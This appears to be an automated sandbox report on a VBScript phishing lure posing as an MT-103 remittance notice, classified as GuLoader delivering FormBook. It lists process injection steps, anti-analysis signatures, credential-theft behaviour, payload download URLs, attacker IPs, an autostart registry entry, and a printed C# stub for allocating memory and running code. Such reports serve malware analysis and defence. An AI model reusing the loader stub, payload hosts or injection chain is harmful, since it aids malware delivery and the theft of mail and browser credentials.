      behaviorgraph top1 signatures2 2 Behavior Graph ID: 558870 Sample: Remittance Information (MT-... Startdate: 24/01/2022 Architecture: WINDOWS Score: 100 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Yara detected GuLoader 2->71 73 12 other signatures 2->73 11 wscript.exe 2 2->11         started        process3 signatures4 85 VBScript performs obfuscated calls to suspicious functions 11->85 87 Wscript starts Powershell (via cmd or directly) 11->87 89 Very long command line found 11->89 91 Encrypted powershell cmdline option found 11->91 14 powershell.exe 25 11->14         started        process5 signatures6 95 Writes to foreign memory regions 14->95 97 Tries to detect Any.run 14->97 99 Hides threads from debuggers 14->99 17 ieinstal.exe 6 14->17         started        21 csc.exe 3 14->21         started        24 conhost.exe 14->24         started        process7 dnsIp8 51 bulkwhatsappsender.in 151.106.117.33, 443, 49820 PLUSSERVER-ASN1DE Germany 17->51 53 www.bulkwhatsappsender.in 17->53 75 Modifies the context of a thread in another process (thread injection) 17->75 77 Tries to detect Any.run 17->77 79 Maps a DLL or memory area into another process 17->79 81 3 other signatures 17->81 26 explorer.exe 3 17->26 injected 49 C:\Users\user\AppData\Local\...\5wwhq3bl.dll, PE32 21->49 dropped 30 cvtres.exe 1 21->30         started        file9 signatures10 process11 dnsIp12 55 www.dentalbatonrouge.com 108.175.14.116, 49846, 49847, 49848 ONEANDONE-ASBrauerstrasse48DE United States 26->55 57 www.yzicpa.com 26->57 93 System process connects to network (likely due to code injection or exploit) 26->93 32 svchost.exe 1 18 26->32         started        36 ieinstal.exe 26->36         started        38 ieinstal.exe 26->38         started        signatures13 process14 file15 45 C:\Users\user\AppData\...\K-Nlogrv.ini, data 32->45 dropped 47 C:\Users\user\AppData\...\K-Nlogri.ini, data 32->47 dropped 59 Detected FormBook malware 32->59 61 Tries to steal Mail credentials (via file / registry access) 32->61 63 Tries to harvest and steal browser information (history, passwords, etc) 32->63 65 3 other signatures 32->65 40 cmd.exe 2 32->40         started        signatures16 process17 signatures18 83 Tries to harvest and steal browser information (history, passwords, etc) 40->83 43 conhost.exe 40->43         started        process19

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Remittance Information (MT-103).vbs4%VirustotalBrowse
      Remittance Information (MT-103).vbs9%ReversingLabsScript-WScript.Downloader.SLoad

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.bin0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://www.dentalbatonrouge.com/k6sm/0%Avira URL Cloudsafe
      https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin10%Avira URL Cloudsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV510%Avira URL Cloudsafe
      https://madecosmetics.store/bin_FlDFmmV154.bin0%Avira URL Cloudsafe
      https://contoso.com/0%URL Reputationsafe
      www.usyeslogistics.com/k6sm/0%Avira URL Cloudsafe
      https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin0%Avira URL Cloudsafe
      https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt0%URL Reputationsafe
      http://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX20%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.dentalbatonrouge.com
      		108.175.14.116
      		truetrue
        		unknown
        bulkwhatsappsender.in
        		151.106.117.33
        		truetrue
          		unknown
          www.bulkwhatsappsender.in
          		unknown
          		unknowntrue
            		unknown
            www.yzicpa.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.dentalbatonrouge.com/k6sm/true
              • Avira URL Cloud: safe
              		unknown
              https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1true
              • Avira URL Cloud: safe
              		unknown
              1,0,350726710,000000A51B2F5000,00000104,00000010,00020000,00000000,1,0true
                		low
                www.usyeslogistics.com/k6sm/true
                • Avira URL Cloud: safe
                		low
                https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bintrue
                • Avira URL Cloud: safe
                		unknown
                http://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000018.00000000.704735877.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.687907955.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.666953603.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.756892182.000000000095C000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.binieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gsvchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874020367.00000000027D8000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51svchost.exe, 0000001A.00000002.875610610.0000000003E1F000.00000004.10000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.msn.com/ocid=iehpsvchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2Csvchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://madecosmetics.store/bin_FlDFmmV154.binieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.google.com/chrome/svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.msn.com/de-ch/?ocid=iehpMicrosoftEdge_DNTExceptionLMEM8Psvchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629svchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservisvchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0osvchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1svchost.exe, 0000001A.00000002.874316141.0000000002E0E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.msn.com/de-ch/ocid=iehpDsvchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.666505278.0000000005441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtsvchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/?ocid=iehpsvchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          108.175.14.116
                                                          		www.dentalbatonrouge.comUnited States
                                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                          151.106.117.33
                                                          		bulkwhatsappsender.inGermany
                                                          		61157PLUSSERVER-ASN1DEtrue

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:558870
                                                          Start date:24.01.2022
                                                          Start time:15:44:07
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 42s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:Remittance Information (MT-103).vbs
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:33
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winVBS@18/16@5/2
                                                          EGA Information:
                                                          • Successful, ratio: 66.7%
                                                          HDC Information:
                                                          • Successful, ratio: 61.3% (good quality ratio 52.8%)
                                                          • Quality average: 71.3%
                                                          • Quality standard deviation: 33.9%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 105
                                                          • Number of non-executed functions: 155
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .vbs
                                                          • Override analysis time to 240s for JS files taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 6944 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          15:46:16API Interceptor29x Sleep call for process: powershell.exe modified
                                                          15:48:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run IB1XSLUHG4 C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                          15:48:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run IB1XSLUHG4 C:\Program Files (x86)\internet explorer\ieinstal.exe

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          PLUSSERVER-ASN1DERSec.arm5Get hashmaliciousBrowse
                                                          • 83.169.49.187
                                                          SKM-97116373-PDF.exeGet hashmaliciousBrowse
                                                          • 151.106.98.40
                                                          SKM-0614483-pdf.exeGet hashmaliciousBrowse
                                                          • 151.106.98.40
                                                          #Ud83d#Udcde-Record-rsmith@kbw.comJanuary.wavv 21 January, 2022 DWyh7dcqmZxZ51H rsmith@kbw.com.htmlGet hashmaliciousBrowse
                                                          • 151.106.116.59
                                                          arm5Get hashmaliciousBrowse
                                                          • 212.40.173.169
                                                          SKM-973116391_PDF.exeGet hashmaliciousBrowse
                                                          • 151.106.98.40
                                                          UnHAnaAW.spcGet hashmaliciousBrowse
                                                          • 85.25.82.172
                                                          h6yupPkSbNGet hashmaliciousBrowse
                                                          • 62.138.220.13
                                                          XwNZbpXHXmGet hashmaliciousBrowse
                                                          • 62.138.220.10
                                                          S6im2ZDYxaGet hashmaliciousBrowse
                                                          • 213.203.206.4
                                                          my.toprat_v1.0.apkGet hashmaliciousBrowse
                                                          • 151.106.109.2
                                                          izr3jChKw3.exeGet hashmaliciousBrowse
                                                          • 31.210.21.253
                                                          2RhbDLMeb3Get hashmaliciousBrowse
                                                          • 62.138.220.12
                                                          dQW7V6Z96ZGet hashmaliciousBrowse
                                                          • 62.138.220.16
                                                          DHL_AWB_1301145024555.exeGet hashmaliciousBrowse
                                                          • 151.106.117.36
                                                          KKveTTgaAAsecNNaaaa.armGet hashmaliciousBrowse
                                                          • 91.250.77.186
                                                          ZEHex8xRX5.exeGet hashmaliciousBrowse
                                                          • 151.106.119.144
                                                          2NU3hgMIz7.exeGet hashmaliciousBrowse
                                                          • 151.106.119.144
                                                          FTK-10294.xlsxGet hashmaliciousBrowse
                                                          • 151.106.119.144
                                                          nE4LlE5GCQ.exeGet hashmaliciousBrowse
                                                          • 151.106.119.144
                                                          ONEANDONE-ASBrauerstrasse48DEbuiodawbdawbuiopdw.x86Get hashmaliciousBrowse
                                                          • 109.228.15.132
                                                          RSec.mipsGet hashmaliciousBrowse
                                                          • 109.228.24.172
                                                          20220120payment.exeGet hashmaliciousBrowse
                                                          • 217.160.0.179
                                                          file.log.exeGet hashmaliciousBrowse
                                                          • 74.208.5.20
                                                          scan doc_o1022111234.exeGet hashmaliciousBrowse
                                                          • 217.160.0.233
                                                          #Ud83d#Udcdeiboxbank.online - bFD38 no reply.pdf .20 January, 2022 .wavv .HTmLGet hashmaliciousBrowse
                                                          • 88.208.245.10
                                                          20220119102820512.xlsxGet hashmaliciousBrowse
                                                          • 217.76.156.252
                                                          ceqpn0UYFJ.exeGet hashmaliciousBrowse
                                                          • 217.160.0.127
                                                          Payment Details USD 98,000.xlsxGet hashmaliciousBrowse
                                                          • 74.208.236.201
                                                          DHL - FINAL REMINDER -Receiver Address verification.exeGet hashmaliciousBrowse
                                                          • 74.208.236.83
                                                          1q7zDeRno7.exeGet hashmaliciousBrowse
                                                          • 217.160.0.179
                                                          GoHpRSeFJ0Get hashmaliciousBrowse
                                                          • 82.223.229.2
                                                          HSBC SWIFT for SWIFT MARINE_pdf.exeGet hashmaliciousBrowse
                                                          • 217.160.0.72
                                                          KONUgynwW37Tb1K.exeGet hashmaliciousBrowse
                                                          • 217.160.0.175
                                                          RFQ272022J.exeGet hashmaliciousBrowse
                                                          • 217.160.0.103
                                                          PQR-365.HESS - CABLES GLAND FOR INFILL (D1-10).exeGet hashmaliciousBrowse
                                                          • 74.208.236.83
                                                          aFTAMyMgiRGet hashmaliciousBrowse
                                                          • 109.228.45.74
                                                          CK8BFmrJs3Get hashmaliciousBrowse
                                                          • 82.223.130.240
                                                          20145639704.exeGet hashmaliciousBrowse
                                                          • 82.223.14.23
                                                          S5MGgUIOGb.dllGet hashmaliciousBrowse
                                                          • 82.223.14.23

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19SF Express.htmGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          lK2NItAmQC.xllGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          Purchase_Order.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          MAybe bad - InBios International, Inc. ACH Detail 1.21.2022.xlsxGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          ORDEN DE COMPRA 80107.pdf________________________.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          Eanbos9FKi.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          58.Wfp.org_2.htmGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          Purchase Ledger Remittance TYP45785.htmlGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          ACH Payment Confirmation.htmGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          pago del 20.01.2022.PDF______________________________________.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          BQhjVcTYBz.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          BQhjVcTYBz.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          28207748-2820.htaGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          Fax 00538471_pdf.htmlGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          Scanned from a Xerox Multifunction Printer.htmGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          1qq1InEPyW.dllGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          RAflB6a2EZ.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          9761572651.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          RAflB6a2EZ.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33
                                                          9761572651.exeGet hashmaliciousBrowse
                                                          • 151.106.117.33

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8003
                                                          Entropy (8bit):4.839308921501875
                                                          Encrypted:false
                                                          SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                          MD5:937C6E940577634844311E349BD4614D
                                                          SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                          SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                          SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                          C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):679
                                                          Entropy (8bit):5.222115022970739
                                                          Encrypted:false
                                                          SSDEEP:12:V/DGrCAMvLQMpSMITSNVtKMP2ULLLVI4H2vO3OwQiP26gjL:JoDMvLQMpFMSzcULLRRH2vO3s+xgX
                                                          MD5:91A53AC70B74CB2F13A7305275F725B5
                                                          SHA1:6662D631A3DE88D58188879EFA65950459EFE634
                                                          SHA-256:49F330CCA2ACCDE02359A71979219E1080B8A98E1DB6A47E8BD60430E583AFFE
                                                          SHA-512:EAFD59594A0F649955E499D4E07BA8795AB860FE09AE0621B326C015E33405DDFB670B853AC52D53887B84A1442AB671E0984027410034E7343786EED532CFC8
                                                          Malicious:false
                                                          Preview:.using System;..using System.Runtime.InteropServices;..public static class Ofayve1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Ofayve6,ref Int32 Swat9,int Rasko8,ref Int32 Ofayve,int Metzerespe9,int Ofayve7);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string BUTTERMA,uint Contra6,int undvrpieti,int Ofayve0,int Foldysy7,int Oboer8,int BLUFF);..[DllImport("kernel32.dll")]public static extern int ReadFile(int Rasko80,uint Rasko81,IntPtr Rasko82,ref Int32 Rasko83,int Rasko84);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Rasko85,int Rasko86,int Rasko87,int Rasko88,int Rasko89);..}

                                                          C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):375
                                                          Entropy (8bit):5.271583720838054
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fjSBuB0zxs7+AEszIN723fjSBub:p37Lvkmb6K2aWwB0WZETaWwb
                                                          MD5:A3255BE19ED555ACC19FEDF01294E04C
                                                          SHA1:94B5331A032C2CA252FC325DE0EFFA1F3CD43F1E
                                                          SHA-256:CAC7EB5E033387E7B415F375DECA89E90ECEA005F06D5F7BBB98FD32172D2C90
                                                          SHA-512:2425C99C9F0D34CB5392F7EBC6BB27BA26EF7D9FD6084992847EB43C01E1E90915B52F05B174270548BBDE16A62000874E2BCEF907181159708653BA43D5F013
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):3.104821703104964
                                                          Encrypted:false
                                                          SSDEEP:24:etGS57pBKUzv8cXj6RIC1yDojmWqGBe05k3rRJXw83tkFr9a9vJmWI+ycuZhNkYn:6hPUcXEV1yDEtLOfEFr9aFP1ulra33q
                                                          MD5:68363D632D5C0C20E270FB06F3FB1D39
                                                          SHA1:7F1A54BDC12C3D29B4E5A77199E3498F87BABBB6
                                                          SHA-256:08896AB4878BBA442762A29E884F4D0B27D3A1DAC8A69717767FABF0142AB8F5
                                                          SHA-512:F30DF9C1A2E836718C47A0AAC2FD37A05A06501ADBE0129E7E28AE075EC9AA3595CBE9D9A8D81323F167EFA8903F9641495CABDC6B42A28817000A5CD00E3045
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[:.a...........!................>%... ...@....... ....................................@..................................$..W....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ %......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...(...l...#Blob...........G.........%3............................................................/.(...M.-...s.-.......................................... 6............ N............ Z.!.......... c.+.......s.....{.......................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):876
                                                          Entropy (8bit):5.3197957688384605
                                                          Encrypted:false
                                                          SSDEEP:24:KOuqd3ka6K2abBVETabaKaM5DqBVKVrdFAMBJTH:yika6C7E+mKxDcVKdBJj
                                                          MD5:B251BE8754B27BD87A0527F33DAED82E
                                                          SHA1:0D8C66F11BCF1CFCF7D179D203DB62160D8E6BDD
                                                          SHA-256:38C5BFACB14A0D74C03871EB0B5391152E20DC6A3151C303E938CCEDFF0CBFCC
                                                          SHA-512:225BE8A65F65531AEE71146898BB99092EFC2FEF4BAF35EFB7920B1DE03525AB80F05F59377B3506F413FBD34C100BD3D3119DA4336735198FD656F38E8E38B6
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1215042136699673
